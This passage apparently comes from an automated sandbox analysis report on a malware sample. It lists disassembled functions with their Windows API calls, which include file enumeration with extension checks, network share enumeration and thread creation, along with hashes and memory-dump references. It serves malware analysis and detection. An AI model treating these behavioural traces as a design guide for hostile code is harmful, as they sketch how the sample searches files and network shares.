                                                                                                                              • Part of subcall function 00E53B4C: _malloc.LIBCMT ref: 00E53B64
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
                                                                                                                            • String ID: vector<T> too long
                                                                                                                            • API String ID: 657562460-3788999226
                                                                                                                            • Opcode ID: 25b31bc49c66ecf89490c4d4b9fff0a9716a8b32f9c5e61fe1d0036fca9e9fa0
                                                                                                                            • Instruction ID: 7272f5c7963254dce25993df1f52e0d269820a1000b860c5f85e09fb5199932b
                                                                                                                            • Opcode Fuzzy Hash: 25b31bc49c66ecf89490c4d4b9fff0a9716a8b32f9c5e61fe1d0036fca9e9fa0
                                                                                                                            • Instruction Fuzzy Hash: 1601F771200B05ABD720CFACD491756F7E8EF80728F20863EEA5597741EBB1E944C781
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E84C00 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00E84AE0: GetStdHandle.KERNEL32(000000F4,00E84C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,00E8480E,.\crypto\cryptlib.c,00000253,pointer != NULL,00000000,00E81D37,00000000,00E3CDAE,00000001,00000001), ref: 00E84AFA
                                                                                                                              • Part of subcall function 00E84AE0: GetFileType.KERNEL32(00000000), ref: 00E84B05
                                                                                                                              • Part of subcall function 00E84AE0: __vfwprintf_p.LIBCMT ref: 00E84B27
                                                                                                                            • _raise.LIBCMT ref: 00E84C18
                                                                                                                              • Part of subcall function 00E5A12E: __getptd_noexit.LIBCMT ref: 00E5A16B
                                                                                                                              • Part of subcall function 00E57CEC: _doexit.LIBCMT ref: 00E57CF6
                                                                                                                            Strings
                                                                                                                            • %s(%d): OpenSSL internal error, assertion failed: %s, xrefs: 00E84C0C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FileHandleType__getptd_noexit__vfwprintf_p_doexit_raise
                                                                                                                            • String ID: %s(%d): OpenSSL internal error, assertion failed: %s
                                                                                                                            • API String ID: 2149077303-4210838268
                                                                                                                            • Opcode ID: 3a90991a9869cdf30411c025bddb8456ae3c6a8031ddf8fd1000fb4d28da430f
                                                                                                                            • Instruction ID: 4baf330f1eb603fab98a7579614562921726cc31e1a1bee996bcbc7d19e8c292
                                                                                                                            • Opcode Fuzzy Hash: 3a90991a9869cdf30411c025bddb8456ae3c6a8031ddf8fd1000fb4d28da430f
                                                                                                                            • Instruction Fuzzy Hash: 66D05E79588200BFD9023790AC03A0A7B92EF88714F408864FA9E140A2D7728124B717
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E3FD57 Relevance: 3.1, APIs: 2, Instructions: 134fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcsstr$Find$CloseExtensionFileNextPath
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2799698630-0
                                                                                                                            • Opcode ID: 8747400e07568a4215522d585cc9e3a01ba7c687a4d05e5050d7678fe8574da6
                                                                                                                            • Instruction ID: 25be6753c25e7f64bf47daca6fca712cded65521aa92f38e8930c6fcfe0081b5
                                                                                                                            • Opcode Fuzzy Hash: 8747400e07568a4215522d585cc9e3a01ba7c687a4d05e5050d7678fe8574da6
                                                                                                                            • Instruction Fuzzy Hash: 87517A71D002198AEF20DF60EC497DEBBB5BF21308F5055B9D909B6251EB729A88CF52
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E53A38 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00E55208: __getptd_noexit.LIBCMT ref: 00E55208
                                                                                                                            • __lock_file.LIBCMT ref: 00E53A7D
                                                                                                                              • Part of subcall function 00E50E53: __lock.LIBCMT ref: 00E50E76
                                                                                                                            • __fclose_nolock.LIBCMT ref: 00E53A88
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2800547568-0
                                                                                                                            • Opcode ID: 10fc92c8e1ae4409a8c92726871e7ed422ccd2e3500a9b2093cb9c0fa1911fb9
                                                                                                                            • Instruction ID: d6ab86cb629643d8750509a3f6e8b6f34a39ff85d0f9d8ceac9b65314665b7cc
                                                                                                                            • Opcode Fuzzy Hash: 10fc92c8e1ae4409a8c92726871e7ed422ccd2e3500a9b2093cb9c0fa1911fb9
                                                                                                                            • Instruction Fuzzy Hash: 94F0BB71C017049AD711BBB5480279E6AD45F40377F21AE44ECA5BB1D2DB7C8B099F51
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E418C5 Relevance: 2.5, APIs: 2, Instructions: 21COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E418DD
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 00E418E9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseFreeHandleVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2443081362-0
                                                                                                                            • Opcode ID: ad333e8bbb19eefb70a4d0714c703a239c21b8847b38b355258450247cf3dfe3
                                                                                                                            • Instruction ID: 926ca9036a1e5d2b6422a216a45b2ecea7d3ebea7948e83614674238ef05226e
                                                                                                                            • Opcode Fuzzy Hash: ad333e8bbb19eefb70a4d0714c703a239c21b8847b38b355258450247cf3dfe3
                                                                                                                            • Instruction Fuzzy Hash: 96E08636A046089BCB248B99ED807ACF374FBC9724F710369D819732D047312D068944
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E4FA10 Relevance: 1.5, APIs: 1, Instructions: 19threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0001F130,?,00000000,00000000), ref: 00E4FA25
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2422867632-0
                                                                                                                            • Opcode ID: 2cfa2cd95b50d1a65557d3c5e810d355e823c7ca3fc327985ed2d7b8c8ba5a77
                                                                                                                            • Instruction ID: 8190788bcc42f78119cb37e064ead92cbeeebf61982d18d4be973051213c9aa6
                                                                                                                            • Opcode Fuzzy Hash: 2cfa2cd95b50d1a65557d3c5e810d355e823c7ca3fc327985ed2d7b8c8ba5a77
                                                                                                                            • Instruction Fuzzy Hash: 6DD0A7323493147BF3140A99AC07F977ADCCF15B10F50403AF609EA1C0D9E1F8208698
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E4FD80 Relevance: 1.5, APIs: 1, Instructions: 18windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00E40BD0: WNetOpenEnumW.MPR(00000002,00000000,00000000,00000000,?), ref: 00E40C12
                                                                                                                            • SendMessageW.USER32(?,00008004,00000000,00000000), ref: 00E4FDA4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumMessageOpenSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1835186980-0
                                                                                                                            • Opcode ID: b2b054db7695b92c5d29bfdc199eba3dd7be8cde47dc04052648e1b853636d33
                                                                                                                            • Instruction ID: 0449307f765849ba9a093d8037446ed3c6da24f0975c022e74527ca5e29ef7da
                                                                                                                            • Opcode Fuzzy Hash: b2b054db7695b92c5d29bfdc199eba3dd7be8cde47dc04052648e1b853636d33
                                                                                                                            • Instruction Fuzzy Hash: F3E0C2311047046AD3209764DC01B86BBC49F18724F10C819E38A6B9C1C5B1B00886A9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E53B43 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 00E53B64
                                                                                                                              • Part of subcall function 00E50C62: __FF_MSGBANNER.LIBCMT ref: 00E50C79
                                                                                                                              • Part of subcall function 00E50C62: __NMSG_WRITE.LIBCMT ref: 00E50C80
                                                                                                                              • Part of subcall function 00E50C62: RtlAllocateHeap.NTDLL(012D0000,00000000,00000001,00000000,00000000,00000000,?,00E58CF4,00000000,00000000,00000000,00000000,?,00E58BE1,00000018,00F37BD0), ref: 00E50CA5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap_malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 501242067-0
                                                                                                                            • Opcode ID: 45d5f89710114bbeff62e00219ee06b850898de9f0c5ef9a20e496a4ec0fe900
                                                                                                                            • Instruction ID: 6eeec0183e22513187c4d73bf9ada43a8993f54dc517ffdf9f43101a104d7494
                                                                                                                            • Opcode Fuzzy Hash: 45d5f89710114bbeff62e00219ee06b850898de9f0c5ef9a20e496a4ec0fe900
                                                                                                                            • Instruction Fuzzy Hash: 86D0231150844D5AAF21213C44534E8BF54C90315171017D5EC8A55853DC01481D8642
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E4FDC0 Relevance: 1.5, APIs: 1, Instructions: 16threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0001FD80,?,00000000,00F59230), ref: 00E4FDD6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2422867632-0
                                                                                                                            • Opcode ID: 59407851ad32af5ce4c28964c2ea95c6edf84203bf8caee0abb29386338d6c11
                                                                                                                            • Instruction ID: f37df88381d85ae6ebebdac62fb4fd298fd1aec95f6332d9558858ddafb7c963
                                                                                                                            • Opcode Fuzzy Hash: 59407851ad32af5ce4c28964c2ea95c6edf84203bf8caee0abb29386338d6c11
                                                                                                                            • Instruction Fuzzy Hash: 29D0A931389309BBE7080BA5AC03F093A988B18B01F500029F704E80D0DAE1E020AA2D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E520B6 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __fsopen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3646066109-0
                                                                                                                            • Opcode ID: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
                                                                                                                            • Instruction ID: 2e825462fae3d752df75ccc5cf561ff01f6f4b510cfb3091e7c7c2cbffd065d8
                                                                                                                            • Opcode Fuzzy Hash: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
                                                                                                                            • Instruction Fuzzy Hash: C9B0927254020C77CF012E82EC02B493B599B50760F048060FF0C28161E6B7E6689799
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E50FDD Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __wfsopen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 197181222-0
                                                                                                                            • Opcode ID: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                                                                                                                            • Instruction ID: 8612185b0ffc1f56a7abebf6e6035f41acccf67f68d88a018f77c47736a7afd4
                                                                                                                            • Opcode Fuzzy Hash: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                                                                                                                            • Instruction Fuzzy Hash: 0FB0927244020C77CE012A82EC02B593B599B416A0F008060FF0C281A1A673A6A49A89
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E42900 Relevance: 1.3, APIs: 1, Instructions: 63COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000010,?,?), ref: 00E42966
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharMultiWide
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 626452242-0
                                                                                                                            • Opcode ID: 2d615ade907281a0067a3c0799b975305ee17cfbb0b5fe4f63a61b5c27fb2457
                                                                                                                            • Instruction ID: cbdaea26d29d46fc61da1555658fa941946ff88c60fc86ba16c025db4db2b057
                                                                                                                            • Opcode Fuzzy Hash: 2d615ade907281a0067a3c0799b975305ee17cfbb0b5fe4f63a61b5c27fb2457
